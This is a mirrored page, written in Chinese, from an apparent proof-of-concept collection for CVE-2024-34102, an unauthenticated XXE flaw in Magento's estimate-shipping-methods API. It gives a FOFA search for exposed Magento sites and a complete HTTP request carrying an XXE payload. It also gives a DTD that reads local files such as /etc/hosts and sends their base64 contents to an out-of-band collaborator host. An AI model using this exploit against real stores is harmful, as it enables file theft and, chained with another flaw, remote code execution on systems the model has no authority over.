mirror of
https://github.com/adysec/POC.git
synced 2025-11-05 02:13:47 +00:00
49 lines
1.5 KiB
Markdown
49 lines
1.5 KiB
Markdown
|
|
## Magento开源电子商务平台接口estimate-shipping-methods存在XXE漏洞(CVE-2024-34102)
|
|||
|
|
|
|||
|
|
2024年6月,Adobe官方披露CVE-2024-34102 Magento estimate-shipping-methods XXE漏洞,攻击者可在无需登陆的情况下构造恶意请求利用XXE读取文件,或者结合CVE-2024-2961 可能造成远程代码执行。
|
|||
|
|
|
|||
|
|
## fofa
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
app="Adobe-Magento"
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
## poc
|
|||
|
|
|
|||
|
|
```yaml
|
|||
|
|
POST /rest/all/V1/guest-carts/test-assetnote/estimate-shipping-methods HTTP/2
|
|||
|
|
Host: example.com
|
|||
|
|
Accept: application/json, text/javascript, */*; q=0.01
|
|||
|
|
X-Requested-With: XMLHttpRequest
|
|||
|
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
|
|||
|
|
Content-Type: application/json
|
|||
|
|
Content-Length: 274
|
|||
|
|
|
|||
|
|
{
|
|||
|
|
"address": {
|
|||
|
|
"totalsReader": {
|
|||
|
|
"collectorList": {
|
|||
|
|
"totalCollector": {
|
|||
|
|
"sourceData": {
|
|||
|
|
"data": "<?xml version=\"1.0\" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM \"http://your_ip:9999/dtd.xml\"> %sp; %param1; ]> <r>&exfil;</r>",
|
|||
|
|
"options": 16
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
DTD 文件
|
|||
|
|
|
|||
|
|
```yaml
|
|||
|
|
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/hosts">
|
|||
|
|
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://collabid.oastify.com/dtd.xml?%data;'>">
|
|||
|
|
```
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
## 漏洞来源
|
|||
|
|
|
|||
|
|
- https://www.assetnote.io/resources/research/why-nested-deserialization-is-harmful-magento-xxe-cve-2024-34102
|